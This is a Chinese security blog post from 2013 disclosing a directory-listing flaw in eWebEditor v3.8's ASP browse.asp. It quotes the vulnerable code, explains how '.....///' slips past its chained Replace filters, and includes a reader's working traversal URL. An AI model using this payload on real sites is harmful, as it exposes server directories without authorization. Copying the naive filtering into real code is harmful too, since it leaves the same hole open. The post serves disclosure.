eWebEditor v3.8 列目录漏洞【asp版本】

标题:asp eWebEditor v3.8 列目录漏洞(其他版本为测试)
漏洞文件:asp/browse.asp
漏洞产生:

Sub InitParam()
        sType = UCase(Trim(Request.QueryString("type")))
        sStyleName = Trim(Request.QueryString("style"))
        sCusDir = Trim(Request.QueryString("cusdir"))
        Dim i, aStyleConfig, bValidStyle
        bValidStyle = False
        For i = 1 To Ubound(aStyle)
                aStyleConfig = Split(aStyle(i), "|||")
                If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
                        bValidStyle = True
                        Exit For
                End If
        Next
        If bValidStyle = False Then
                OutScript("alert('Invalid Style.')")
        End If
        sBaseUrl = aStyleConfig(19)
        nAllowBrowse = CLng(aStyleConfig(43))
        nCusDirFlag = Clng(aStyleConfig(61))
        If nAllowBrowse <> 1 Then
                OutScript("alert('Do not allow browse!')")
        End If
        If nCusDirFlag <> 1 Then
                sCusDir = ""
        Else
                sCusDir = Replace(sCusDir, "", "/")
                If Left(sCusDir, 1) = "/" Or Left(sCusDir, 1) = "." Or Right(sCusDir, 1) = "." Or InStr(sCusDir, "./") > 0 Or InStr(sCusDir, "/.") > 0 Or InStr(sCusDir, "//") > 0 Then
                        sCusDir = ""
                Else
                        If Right(sCusDir, 1) <> "/" Then
                                sCusDir = sCusDir & "/"
                        End If
                End If
        End If
        sUploadDir = aStyleConfig(3)
        If Left(sUploadDir, 1) <> "/" Then
                sUploadDir = "../" & sUploadDir
        End If
        Select Case sBaseUrl
        Case "0"
                sContentPath = aStyleConfig(23)
        Case "1"
                sContentPath = RelativePath2RootPath(sUploadDir)
        Case "2"
                sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
        End Select
    sUploadDir = sUploadDir & sCusDir
        sContentPath = sContentPath & sCusDir
        Select Case sType
        Case "FILE"
                sAllowExt = ""
        Case "MEDIA"
                sAllowExt = "rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov"
        Case "FLASH"
                sAllowExt = "swf"
        Case Else
                sAllowExt = "bmp|jpg|jpeg|png|gif"
        End Select
        sCurrDir = sUploadDir
        sDir = Trim(Request("dir"))
'1.假设dir= ../
'2.假设dir=...//
'3.假设dir=.....///
        sDir = Replace(sDir, "", "/")  '过滤1
        sDir = Replace(sDir, "../", "") '过滤2
'1.到这里就被过滤了
        sDir = Replace(sDir, "./", "") '过滤3
'2到这里也被功率了
'3到这里就成../了。比较有趣的饶过!好象不少cms这样过滤过。[/color]
        If sDir <> "" Then
                If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
                        sCurrDir = sUploadDir & sDir & "/"
                Else
                        sDir = ""
                End If
        End If
End Sub

漏洞发生者:鬼哥

本文固定链接: https://www.unhonker.com/bug/1236.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2013年05月27日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: eWebEditor v3.8 列目录漏洞【asp版本】 | 90' s Blog|关注网络信息安全
关键字:

eWebEditor v3.8 列目录漏洞【asp版本】:目前有2 条留言

  1. 沙发
    草哲:

    攻击代码示例:
    http://localhost/asp/browse.asp?action=file&type=file&dir=…..///DiaLog&style=full650&cusdir=&foldertype=upload&returnflag=span_upload
    跳转到上eWebEditor的DiaLog目录

    2013-05-27 21:56

发表评论

您必须 [ 登录 ] 才能发表留言!